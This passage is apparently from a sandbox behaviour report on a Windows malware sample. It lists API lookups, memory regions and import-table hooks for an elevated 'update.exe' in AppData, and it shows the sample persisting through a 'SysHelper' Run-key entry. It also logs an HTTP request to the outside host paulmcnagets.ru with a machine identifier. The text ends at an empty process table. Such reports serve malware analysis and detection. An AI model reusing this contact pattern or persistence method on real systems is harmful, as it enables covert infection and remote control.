Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x7740ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x773f34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x773f110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x773f3587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x773f14fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x773f11e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x773f49ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x773f1916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x773f87c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x7741772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x773f51cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x773f51e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x773f3509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x773f1725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x773f4d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77ac45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x773f3531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x773f58a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x773f17b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x77497bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x773f1328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x7740c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x773f8a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x773f34c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x773f495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x7741d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77ad1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x7741d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x7747454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x773f14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77abe026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x77417aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x773f469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x773f1946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77ab2270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77ab22b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77ac3002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x773f51b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x774740d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x773f4a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x773f7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x773f14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x773f1450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x773f17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x773f4493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x773f179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x7741d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x773f5189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x773f4a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x77413102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x773f5235	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x75e69abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x75e688f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = BeginPaint, address_out = 0x75e71361	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x75e67809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x75e6b17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x75e70dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x75e67136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x75e68a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x75e73559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77ac25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x75e705ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x75e68bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x75ebfd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x75e6787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x75e69a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EndPaint, address_out = 0x75e71341	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x75e69679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x75e678e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x7573369c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7572df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x7573157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7572df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x757314d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x7573469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7572df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x7572ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x7572ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x75747144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x7573468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7572df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x75732a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x757346ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7572e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x7572df7e	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x760317bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x7602e141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x75fb9ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x761e7078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75fc1e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x7582b636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75837259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x758586d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75859d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x7700fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x77004642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x77003eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x77003ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x77003e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x77003f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x77005dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x77004af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x75329263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x757db131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x757d311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x757e7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x752c436b	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x752d572c	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x7521c544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x773f4d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x7747410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x77474195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x773fd31f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x7740ee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x77ad441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x77afc50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x77afc381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x7740f088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x77ae05d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x77afca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77ab0b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x77b6fde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x77b01e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x77474761	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x7746cd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x7747424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x774746b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x77486676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x77474751	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x774865f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x774747c1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x774747e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x774747f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x7740eee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x770c1544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x770c1408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x770c152c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76025708	2	Fn

Service (2)

Operation	Additional Information	Success	Count	Logfile
Open	database_name = SERVICES_ACTIVE_DATABASE		1	Fn
Open Manager	database_name = SERVICES_ACTIVE_DATABASE		1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	LPCWSTRszTitle	class_name = LPCWSTRszWindowClass, wndproc_parameter = 0		1	Fn

System (963)

Operation	Additional Information	Count	Logfile
Sleep	duration = 1 milliseconds (0.001 seconds)	957	Fn
Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-11-19 13:57:17 (UTC)	1	Fn
Get Time	type = Ticks, time = 35225	1	Fn
Get Time	type = System Time, time = 2018-11-19 13:57:18 (UTC)	1	Fn
Get Info	type = Operating System	1	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}		1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Network Behavior

HTTP Sessions (1)

Information	Value
Total Data Sent	241 bytes
Total Data Received	107 bytes
Contacted Host Count	1
Contacted Hosts	paulmcnagets.ru

HTTP Session #1

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	paulmcnagets.ru
Server Port	80
Data Sent	241
Data Received	107

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = paulmcnagets.ru, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /003/get.php	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://paulmcnagets.ru/003/get.php?pid=33E9AA5ADDB65D39A5923495F06BCF33	1	Fn
Read Response	size = 1024, size_out = 103	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Close Session	-	1	Fn

Process #18: update.exe

895

Information	Value
ID	#18
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --ForNetRes 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40 IsAutoStart IsNotTask
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\
Monitor	Start Time: 00:01:52, Reason: Child Process
Unmonitor	End Time: 00:02:18, Reason: Self Terminated
Monitor Duration	00:00:26

OS Process Information

Information	Value
PID	0x7f8
Parent PID	0x68c (c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 5FC 0x 4D8 0x 344 0x 7E4 0x 7E0

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
private_0x0000000000210000	0x00210000	0x0033ffff	Private Memory	rw	-
pagefile_0x0000000000210000	0x00210000	0x00214fff	Pagefile Backed Memory	rw	-
private_0x0000000000210000	0x00210000	0x0025efff	Private Memory	rw	-
pagefile_0x0000000000210000	0x00210000	0x00216fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000220000	0x00220000	0x00221fff	Pagefile Backed Memory	rw	-
private_0x0000000000230000	0x00230000	0x0026ffff	Private Memory	rw	-
private_0x0000000000270000	0x00270000	0x002affff	Private Memory	rw	-
rsaenh.dll	0x002b0000	0x002ebfff	Memory Mapped File	r	-
private_0x00000000002b0000	0x002b0000	0x002effff	Private Memory	rw	-
private_0x00000000002f0000	0x002f0000	0x0032ffff	Private Memory	rw	-
private_0x0000000000330000	0x00330000	0x0033ffff	Private Memory	rw	-
private_0x0000000000340000	0x00340000	0x0037ffff	Private Memory	rw	-
private_0x0000000000380000	0x00380000	0x003fffff	Private Memory	rw	-
update.exe	0x00400000	0x0049afff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x00000000004a0000	0x004a0000	0x0059ffff	Private Memory	rw	-
private_0x0000000000610000	0x00610000	0x0061ffff	Private Memory	rw	-
private_0x0000000000680000	0x00680000	0x0077ffff	Private Memory	rw	-
pagefile_0x0000000000780000	0x00780000	0x00907fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000910000	0x00910000	0x00a90fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000aa0000	0x00aa0000	0x01e9ffff	Pagefile Backed Memory	r	-
private_0x0000000001ea0000	0x01ea0000	0x01f7ffff	Private Memory	rw	-
pagefile_0x0000000001f80000	0x01f80000	0x0205efff	Pagefile Backed Memory	r	-
private_0x0000000002080000	0x02080000	0x0208ffff	Private Memory	rw	-
sortdefault.nls	0x02090000	0x0235efff	Memory Mapped File	r	-
private_0x0000000002360000	0x02360000	0x0245ffff	Private Memory	rw	-
pagefile_0x0000000002460000	0x02460000	0x02852fff	Pagefile Backed Memory	r	-
private_0x0000000002860000	0x02860000	0x0295ffff	Private Memory	rw	-
private_0x0000000002960000	0x02960000	0x02a5ffff	Private Memory	rw	-
kernelbase.dll.mui	0x02a60000	0x02b1ffff	Memory Mapped File	rw	-
dwmapi.dll	0x73640000	0x73652fff	Memory Mapped File	rwx	-
uxtheme.dll	0x73dd0000	0x73e4ffff	Memory Mapped File	rwx	-
wow64win.dll	0x73ff0000	0x7404bfff	Memory Mapped File	rwx	-
browcli.dll	0x74c80000	0x74c8cfff	Memory Mapped File	rwx	-
netutils.dll	0x74c90000	0x74c98fff	Memory Mapped File	rwx	-
cscapi.dll	0x74ca0000	0x74caafff	Memory Mapped File	rwx	-
wkscli.dll	0x74cb0000	0x74cbefff	Memory Mapped File	rwx	-
davhlpr.dll	0x74cc0000	0x74cc7fff	Memory Mapped File	rwx	-
davclnt.dll	0x74cd0000	0x74ce6fff	Memory Mapped File	rwx	-
ntlanman.dll	0x74cf0000	0x74d03fff	Memory Mapped File	rwx	-
winsta.dll	0x74d10000	0x74d38fff	Memory Mapped File	rwx	-
drprov.dll	0x74d40000	0x74d47fff	Memory Mapped File	rwx	-
rsaenh.dll	0x75180000	0x751bafff	Memory Mapped File	rwx	-
cryptsp.dll	0x751c0000	0x751d5fff	Memory Mapped File	rwx	-
msvcr100.dll	0x75200000	0x752befff	Memory Mapped File	rwx	-
dnsapi.dll	0x752c0000	0x75303fff	Memory Mapped File	rwx	-
winnsi.dll	0x75310000	0x75316fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x75320000	0x7533bfff	Memory Mapped File	rwx	-
winmm.dll	0x75340000	0x75371fff	Memory Mapped File	rwx	-
mpr.dll	0x75380000	0x75391fff	Memory Mapped File	rwx	-
msimg32.dll	0x753a0000	0x753a4fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x754a0000	0x754a7fff	Memory Mapped File	rwx	-
wow64.dll	0x754b0000	0x754eefff	Memory Mapped File	rwx	-
cryptbase.dll	0x755e0000	0x755ebfff	Memory Mapped File	rwx	-
sspicli.dll	0x755f0000	0x7564ffff	Memory Mapped File	rwx	-
msctf.dll	0x75650000	0x7571bfff	Memory Mapped File	rwx	-
advapi32.dll	0x75720000	0x757bffff	Memory Mapped File	rwx	-
ws2_32.dll	0x757d0000	0x75804fff	Memory Mapped File	rwx	-
ole32.dll	0x75810000	0x7596bfff	Memory Mapped File	rwx	-
msasn1.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
crypt32.dll	0x75980000	0x75a9cfff	Memory Mapped File	rwx	-
usp10.dll	0x75b30000	0x75bccfff	Memory Mapped File	rwx	-
wininet.dll	0x75bd0000	0x75cc4fff	Memory Mapped File	rwx	-
imm32.dll	0x75d30000	0x75d8ffff	Memory Mapped File	rwx	-
msvcrt.dll	0x75d90000	0x75e3bfff	Memory Mapped File	rwx	-
lpk.dll	0x75e40000	0x75e49fff	Memory Mapped File	rwx	-
user32.dll	0x75e50000	0x75f4ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f50000	0x75f95fff	Memory Mapped File	rwx	-
shell32.dll	0x75fa0000	0x76be9fff	Memory Mapped File	rwx	-
iertutil.dll	0x76c40000	0x76e3afff	Memory Mapped File	rwx	-
shlwapi.dll	0x76e40000	0x76e96fff	Memory Mapped File	rwx	-
sechost.dll	0x76ea0000	0x76eb8fff	Memory Mapped File	rwx	-
urlmon.dll	0x76ec0000	0x76ff5fff	Memory Mapped File	rwx	-
oleaut32.dll	0x77000000	0x7708efff	Memory Mapped File	rwx	-
psapi.dll	0x770c0000	0x770c4fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x77150000	0x7723ffff	Memory Mapped File	rwx	-
gdi32.dll	0x77290000	0x7731ffff	Memory Mapped File	rwx	-
kernel32.dll	0x773e0000	0x774effff	Memory Mapped File	rwx	-
private_0x0000000077690000	0x77690000	0x777aefff	Private Memory	rwx	-
private_0x00000000777b0000	0x777b0000	0x778a9fff	Private Memory	rwx	-
ntdll.dll	0x778b0000	0x77a58fff	Memory Mapped File	rwx	-
nsi.dll	0x77a60000	0x77a65fff	Memory Mapped File	rwx	-
ntdll.dll	0x77a90000	0x77c0ffff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x00000000fffaa000	0xfffaa000	0xfffacfff	Private Memory	rw	-
private_0x00000000fffad000	0xfffad000	0xfffaffff	Private Memory	rw	-
pagefile_0x00000000fffb0000	0xfffb0000	0xfffd2fff	Pagefile Backed Memory	r	-
private_0x00000000fffd5000	0xfffd5000	0xfffd7fff	Private Memory	rw	-
private_0x00000000fffd8000	0xfffd8000	0xfffdafff	Private Memory	rw	-
private_0x00000000fffdb000	0xfffdb000	0xfffddfff	Private Memory	rw	-
private_0x00000000fffde000	0xfffde000	0xfffdefff	Private Memory	rw	-
private_0x00000000fffdf000	0xfffdf000	0xfffdffff	Private Memory	rw	-
private_0x00000000fffe0000	0xfffe0000	0x7fffffeffff	Private Memory	r	-

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x0000000000680000:+0x136af	13. entry of update.exe	4 bytes	kernel32.dll:GetCommProperties+0x0 now points to private_0x0000000000680000:+0x2006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x136af	14. entry of update.exe	4 bytes	kernel32.dll:GetThreadSelectorEntry+0x0 now points to pagefile_0x0000000000aa0000:+0x3d77e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x136af	18. entry of update.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to pagefile_0x0000000000010000:+0x25d7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x136af	21. entry of update.exe	4 bytes	kernel32.dll:SetLastError+0x0 now points to private_0x0000000000680000:+0x2006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x136af	22. entry of update.exe	4 bytes	kernel32.dll:CompareStringW+0x0 now points to pagefile_0x0000000000aa0000:+0x3dc7e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x136af	24. entry of update.exe	4 bytes	kernel32.dll:GetLocaleInfoW+0x0 now points to pagefile_0x0000000000910000:+0x120043	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x136af	26. entry of update.exe	4 bytes	kernel32.dll:GetProcessHeap+0x0 now points to pagefile_0x0000000000010000:+0x25b7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x136af	37. entry of update.exe	4 bytes	kernel32.dll:FreeLibrary+0x0 now points to pagefile_0x0000000000aa0000:+0xa8be8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x136af	64. entry of update.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x0000000000aa0000:+0xc98d56	... Actions Go to Installer Region Go to Target Region

Host Behavior

File (3)

Operation	Filename	Additional Information	Count	Logfile
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn

Registry (2)

Operation	Key	Additional Information	Success	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-		1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --AutoStart, type = REG_EXPAND_SZ		1	Fn

Process (430)

Operation	Process	Additional Information	Count	Logfile
